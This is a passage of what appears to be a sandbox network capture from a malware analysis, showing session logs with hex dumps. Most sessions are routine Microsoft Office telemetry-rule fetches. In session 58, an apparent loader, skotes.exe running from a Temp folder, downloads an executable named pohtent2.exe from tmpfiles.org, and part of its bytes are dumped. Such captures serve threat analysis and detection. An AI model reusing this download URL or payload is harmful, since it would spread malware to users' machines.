56	192.168.2.4	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:09 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:09 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:09 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063309Z-16547b76f7fkj7j4hC1DFW0a9g00000007qg00000000c4v6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:09 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49785	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:09 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:09 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:09 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 9919728d-d01e-002b-4b0b-2d25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063309Z-16547b76f7fvllnfhC1DFWxkg800000007wg000000001hyy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:09 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49799	172.67.195.247	443	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	86	OUT	GET /dl/15309322/pohtent2.exe HTTP/1.1 Host: tmpfiles.org Connection: Keep-Alive
2024-11-07 06:33:10 UTC	1144	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: application/x-dosexec Content-Length: 1366016 Connection: close Content-Disposition: inline; filename=pohtent2.exe Cache-Control: no-cache, private CF-Cache-Status: BYPASS Set-Cookie: XSRF-TOKEN=eyJpdiI6InZpOHR3SzdqZmNhSk9CbUJiTDM3Q2c9PSIsInZhbHVlIjoiZU4yQ2hYVFlNcG1nYkZFUExKS2tzTDU1UW8xYTR6aWRMMWRIZXl6bXBvd1ZYcE5FcmRnMGRpczZuNXByU2dBNTVyN01nZDFreXp1WW9lUDVKMHlDd1hUdWpzdzB3eXNJZjJVczZEWkF0djdmaDlZY29qZXlFSEVPRjF2RGh5aWUiLCJtYWMiOiI0NjUzMTFmYTkzNWY1MDAyNzY1YjFlYzNjNmU5NDRlYjgwYTA2N2NkYzY1ZmI5ZTM3YmI5Y2NkNjg1MmNmYmY5In0%3D; expires=Thu, 07-Nov-2024 08:33:10 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: tmpfiles_session=eyJpdiI6ImF4d25SdnkzOGl5VFpGYVlFYklmQ0E9PSIsInZhbHVlIjoiY3A4WmhTeEx0QU9kOTRKNjU0cktjT2IvR21vU1BNQnpya2NhVjFENW1sS09iUFpmZCtIZ0xpaHl2Y3I4Uk9jbVZkaXhZN01ZdVZxdncxYWhzazYxeEZIV3hOV1pQR0VkQTlIeEl2VGlBZENaeVRuYW42VExsenJRQlF3QTNFZ3kiLCJtYWMiOiJlYzRhZDdlZWU5NmI0ZDFkZjQ2ZGViYzAzZTY5MjI3ZmVlZGQwMmFkZDE3OTUxYWYzNTU0YWE5YzIwZjZiNTVmIn0%3D; expires=Thu, 07-Nov-2024 08:33:10 GMT; Max-Age=7200; path=/; httponly; samesite=lax Accept-Ranges: bytes
2024-11-07 06:33:10 UTC	605	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 53 37 4c 30 25 32 46 58 64 7a 25 32 42 42 56 36 47 43 32 42 61 34 7a 54 68 66 57 50 77 53 44 78 43 6b 62 53 25 32 46 53 25 32 42 6f 69 51 56 72 61 7a 50 25 32 42 62 25 32 46 78 6a 36 58 4c 38 78 49 62 75 39 25 32 42 56 25 32 42 67 33 45 4b 67 69 6f 30 35 41 38 5a 41 4d 4f 52 43 25 32 46 4e 48 47 64 36 56 62 65 70 39 49 61 37 6a 63 6c 7a 66 62 30 5a 62 6e 43 69 6b 41 54 72 31 74 58 66 37 46 6f 45 4d 74 77 52 32 25 32 46 48 4e 46 44 71 45 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7L0%2FXdz%2BBV6GC2Ba4zThfWPwSDxCkbS%2FS%2BoiQVrazP%2Bb%2Fxj6XL8xIbu9%2BV%2Bg3EKgio05A8ZAMORC%2FNHGd6Vbep9Ia7jclzfb0ZbnCikATr1tXf7FoEMtwR2%2FHNFDqE%3D"}],"group":"cf-nel","max_a
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f6 3a 2c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ce 14 00 00 08 00 00 00 00 00 00 6e ed 14 00 00 20 00 00 00 00 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:,gn @ @`
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 74 05 00 00 01 28 44 00 00 06 2a 56 03 14 fe 01 16 fe 01 14 28 1a 00 00 06 02 03 7d 6e 00 00 0a 2a 32 02 7b 6e 00 00 0a 6f 58 00 00 0a 2a 3a 02 7b 6e 00 00 0a 03 17 28 43 00 00 06 2a 5e 02 7b 6e 00 00 0a 28 40 00 00 06 02 7b 6e 00 00 0a 6f 5d 00 00 0a 2a 0a 16 2a 32 16 28 04 00 00 2b 80 20 00 00 04 2a 32 02 28 66 00 00 0a 28 5a 00 00 06 2a 4e 28 6a 00 00 0a 02 03 16 28 67 00 00 0a 6f 6f 00 00 0a 2a 32 02 28 66 00 00 0a 28 05 00 00 2b 2a 4e 28 6a 00 00 0a 02 03 16 28 67 00 00 0a 6f 06 00 00 2b 2a 32 02 28 66 00 00 0a 28 5e 00 00 06 2a 36 02 03 28 07 00 00 2b 28 71 00 00 0a 2a 32 02 28 66 00 00 0a 28 08 00 00 2b 2a 36 02 03 28 09 00 00 2b 28 0a 00 00 2b 2a 32 02 28 66 00 00 0a 28 64 00 00 06 2a 32 02 28 66 00 00 0a 28 63 00 00 06 2a 32 02 74 10 00 00 1b 28 Data Ascii: t(DV(}n2{noX:{n(C^{n(@{no]*2(+ 2(f(ZN(j(goo2(f(+N(j(go+2(f(^6(+(q2(f(+6(+(+2(f(d2(f(c2t(
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 17 01 00 0a 73 18 01 00 0a 02 25 fe 07 14 01 00 0a 73 fb 00 00 0a 03 04 05 14 6f 1f 00 00 2b 2a 9e 28 6a 00 00 0a 02 25 fe 07 19 01 00 0a 73 1a 01 00 0a 02 25 fe 07 1b 01 00 0a 73 fb 00 00 0a 03 14 6f 20 00 00 2b 2a 9e 28 6a 00 00 0a 02 25 fe 07 1c 01 00 0a 73 1d 01 00 0a 02 25 fe 07 1e 01 00 0a 73 fb 00 00 0a 03 14 6f 21 00 00 2b 2a 9a 28 6a 00 00 0a 02 fe 06 1f 01 00 0a 73 20 01 00 0a 02 fe 06 21 01 00 0a 73 fb 00 00 0a 03 04 14 6f 22 00 00 2b 2a 9a 28 6a 00 00 0a 02 fe 06 22 01 00 0a 73 23 01 00 0a 02 fe 06 21 01 00 0a 73 fb 00 00 0a 03 04 14 6f 23 00 00 2b 2a 9a 28 6a 00 00 0a 02 fe 06 24 01 00 0a 73 25 01 00 0a 02 fe 06 21 01 00 0a 73 fb 00 00 0a 03 04 14 6f 24 00 00 2b 2a 92 28 26 01 00 0a 02 fe 06 27 01 00 0a 73 01 01 00 0a 02 fe 06 28 01 00 0a 73 Data Ascii: s%so+(j%s%so +(j%s%so!+(js !so"+(j"s#!so#+(j$s%!so$+(&'s(s
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 00 04 02 7b 72 00 00 04 02 7b 73 00 00 04 03 6f 84 01 00 0a 2a 7e 02 7b 74 00 00 04 02 7b 75 00 00 04 02 7b 76 00 00 04 02 7b 77 00 00 04 03 6f 85 01 00 0a 2a 96 02 7b 78 00 00 04 02 7b 79 00 00 04 02 7b 7a 00 00 04 02 7b 7b 00 00 04 02 7b 7c 00 00 04 03 6f 86 01 00 0a 2a 96 02 7b 7d 00 00 04 02 7b 7e 00 00 04 02 7b 7f 00 00 04 02 7b 80 00 00 04 02 7b 81 00 00 04 03 6f 87 01 00 0a 2a 32 02 7b 86 00 00 04 6f 89 01 00 0a 2a 72 02 7b 85 00 00 04 7b 84 00 00 04 02 7b 85 00 00 04 7b 83 00 00 04 6f 67 01 00 0a 2a 4e 02 7b 87 00 00 04 02 7b 88 00 00 04 03 6f 8a 01 00 0a 2a ea 02 7b 89 00 00 04 17 04 7e 8c 00 00 04 3a 11 00 00 00 14 fe 06 25 01 00 06 73 77 01 00 0a 80 8c 00 00 04 7e 8c 00 00 04 02 fe 06 26 01 00 06 73 2e 00 00 0a 28 2f 00 00 2b 2a 4a 02 7b 8b 00 Data Ascii: {r{so~{t{u{v{wo{x{y{z{{{\|o{}{~{{{o2{or{{{{ogN{{o{~:%sw~&s.(/+J{
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 00 04 2a 22 02 03 7d c9 00 00 04 2a 5e 02 28 92 01 00 06 02 28 90 01 00 06 6f 7d 01 00 06 28 b3 01 00 06 2a 46 02 28 97 01 00 06 72 a4 09 00 70 28 c5 01 00 06 2a da 02 17 8d ad 00 00 01 25 16 72 c2 09 00 70 a2 16 6f e2 01 00 0a 25 8e 69 18 3b 0b 00 00 00 72 00 0a 00 70 73 c9 01 00 0a 7a 17 9a 28 c4 01 00 06 28 9a 01 00 06 2a 4a 03 02 28 b4 01 00 06 73 d9 01 00 0a 73 94 01 00 06 2a 1e 02 7b ca 00 00 04 2a 1e 02 7b cb 00 00 04 2a 22 02 03 7d cb 00 00 04 2a 56 02 28 2d 00 00 0a 02 03 7d ca 00 00 04 02 04 28 9e 01 00 06 2a 46 02 28 a1 01 00 06 72 02 0c 00 70 28 c5 01 00 06 2a 32 02 28 c4 01 00 06 28 a4 01 00 06 2a 1e 02 7b cc 00 00 04 2a 1e 02 7b cd 00 00 04 2a 56 02 28 2d 00 00 0a 02 03 7d cc 00 00 04 02 04 7d cd 00 00 04 2a b6 73 e0 01 00 0a 25 02 28 a6 01 Data Ascii: "}^((o}(F(rp(%rpo%i;rpsz((J(ss{{"}V(-}(F(rp(2(({{V(-}}*s%(
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 00 0a 7a 02 06 69 28 12 00 00 06 2a 00 00 00 1b 30 01 00 2d 00 00 00 00 00 00 00 02 7b 08 00 00 04 6f 26 00 00 0a 02 7b 08 00 00 04 28 86 00 00 06 02 7b 09 00 00 04 6f 44 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 00 01 10 00 00 00 00 16 00 10 26 00 06 9b 00 00 01 13 30 03 00 42 00 00 00 00 00 00 00 02 28 2d 00 00 0a 02 28 45 00 00 0a 25 3a 06 00 00 00 26 7e 0e 00 00 04 7d 46 00 00 0a 02 7b 46 00 00 0a 14 fe 01 16 fe 01 14 28 1a 00 00 06 02 02 fe 06 47 00 00 0a 73 48 00 00 0a 7d 49 00 00 0a 2a 00 00 13 30 03 00 29 00 00 00 07 00 00 11 02 7b 4c 00 00 0a 0a 06 0b 07 03 28 4d 00 00 0a 74 02 00 00 1b 0c 02 7c 4c 00 00 0a 08 07 28 03 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 07 00 00 11 02 7b 4c 00 00 0a 0a 06 0b 07 03 28 4f 00 00 0a Data Ascii: zi(0-{o&{({oD&&0B(-(E%:&~}F{F(GsH}I0){L(Mt\|L(+30){L(O
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 00 00 04 28 66 00 00 0a 16 28 67 00 00 0a 6f 6c 00 00 0a 26 2a 00 13 30 01 00 0a 00 00 00 0f 00 00 11 12 00 fe 15 15 00 00 02 06 2a 00 00 13 30 02 00 14 00 00 00 10 00 00 11 7e 20 00 00 04 28 14 00 00 06 0a 12 00 03 28 3d 00 00 06 2a 13 30 02 00 14 00 00 00 10 00 00 11 7e 20 00 00 04 28 14 00 00 06 0a 12 00 03 28 3e 00 00 06 2a 13 30 02 00 3b 00 00 00 06 00 00 11 0f 00 28 40 00 00 0a 6a 0a 06 15 6a 3f 0c 00 00 00 06 20 ff ff ff 7f 6a 3e 10 00 00 00 72 01 01 00 70 72 85 01 00 70 73 73 00 00 0a 7a 28 1b 00 00 06 06 69 03 28 64 00 00 06 2a 00 13 30 05 00 ed 00 00 00 11 00 00 11 14 0a 73 76 00 00 06 0b 02 15 3c 10 00 00 00 72 01 01 00 70 72 85 01 00 70 73 73 00 00 0a 7a 28 1b 00 00 06 0f 01 28 74 00 00 0a 39 27 00 00 00 7e 23 00 00 04 3a 11 00 00 00 14 fe 06 Data Ascii: (f(gol&00~ ((=0~ ((>0;(@jj? j>rprpssz(i(d*0sv<rprpssz((t9'~#:
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 00 1b 30 03 00 2f 00 00 00 1a 00 00 11 16 0a 7e 2d 00 00 04 25 0b 12 00 28 b4 00 00 0a 7e 2d 00 00 04 02 14 6f b5 00 00 0a dd 0d 00 00 00 06 39 06 00 00 00 07 28 b6 00 00 0a dc 2a 00 01 10 00 00 02 00 02 00 1f 21 00 0d 00 00 00 00 1b 30 02 00 2f 00 00 00 1a 00 00 11 16 0a 7e 2d 00 00 04 25 0b 12 00 28 b4 00 00 0a 7e 2d 00 00 04 02 6f b7 00 00 0a 26 dd 0d 00 00 00 06 39 06 00 00 00 07 28 b6 00 00 0a dc 2a 00 01 10 00 00 02 00 02 00 1f 21 00 0d 00 00 00 00 1b 30 03 00 7a 00 00 00 1b 00 00 11 73 d7 00 00 06 0a 06 02 7d 31 00 00 04 06 03 73 ba 00 00 0a 7d 2f 00 00 04 06 14 7d 30 00 00 04 06 06 fe 06 d8 00 00 06 73 bb 00 00 0a 7d 30 00 00 04 06 7b 31 00 00 04 06 7b 30 00 00 04 6f bc 00 00 0a 06 7b 31 00 00 04 03 06 7b 2f 00 00 04 6f bd 00 00 0a dd 14 00 00 00 Data Ascii: 0/~-%(~-o9(!0/~-%(~-o&9(!0zs}1s}/}0s}0{1{0o{1{/o
2024-11-07 06:33:10 UTC	1369	IN	Data Raw: 7b 48 00 00 04 6f ef 00 00 0a 2a 00 01 10 00 00 00 00 43 00 18 5b 00 14 01 00 00 01 1b 30 05 00 7c 00 00 00 23 00 00 11 73 f4 00 00 06 0a 06 02 7d 4e 00 00 04 06 03 73 e4 00 00 0a 7d 4c 00 00 04 06 14 7d 4d 00 00 04 06 06 fe 06 f5 00 00 06 73 f0 00 00 0a 7d 4d 00 00 04 06 7b 4e 00 00 04 06 7b 4d 00 00 04 6f f1 00 00 0a 06 7b 4e 00 00 04 03 04 05 06 7b 4c 00 00 04 6f f2 00 00 0a dd 14 00 00 00 26 06 7b 4e 00 00 04 06 7b 4d 00 00 04 6f f3 00 00 0a fe 1a 06 7b 4c 00 00 04 6f e9 00 00 0a 2a 01 10 00 00 00 00 43 00 19 5c 00 14 01 00 00 01 1b 30 05 00 7c 00 00 00 24 00 00 11 73 f9 00 00 06 0a 06 02 7d 53 00 00 04 06 03 73 e4 00 00 0a 7d 51 00 00 04 06 14 7d 52 00 00 04 06 06 fe 06 fa 00 00 06 73 f4 00 00 0a 7d 52 00 00 04 06 7b 53 00 00 04 06 7b 52 00 00 04 6f Data Ascii: {HoC[0\|#s}Ns}L}Ms}M{N{Mo{N{Lo&{N{Mo{LoC\0\|$s}Ss}Q}Rs}R{S{Ro

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:10 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 4c090a89-b01e-0098-3360-2ecead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063310Z-15869dbbcc6lxrkghC1DFWp3wc00000008n00000000046fn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:10 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 84934087-701e-0021-808e-2d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063310Z-15869dbbcc6gt87nhC1DFWh9un000000087g0000000070rv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:10 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:10 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063310Z-16547b76f7f7jnp2hC1DFWfc3000000007q000000000ntx0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:10 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:10 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:10 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063310Z-16547b76f7f2g4rlhC1DFWnx8800000007m000000000gx4d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
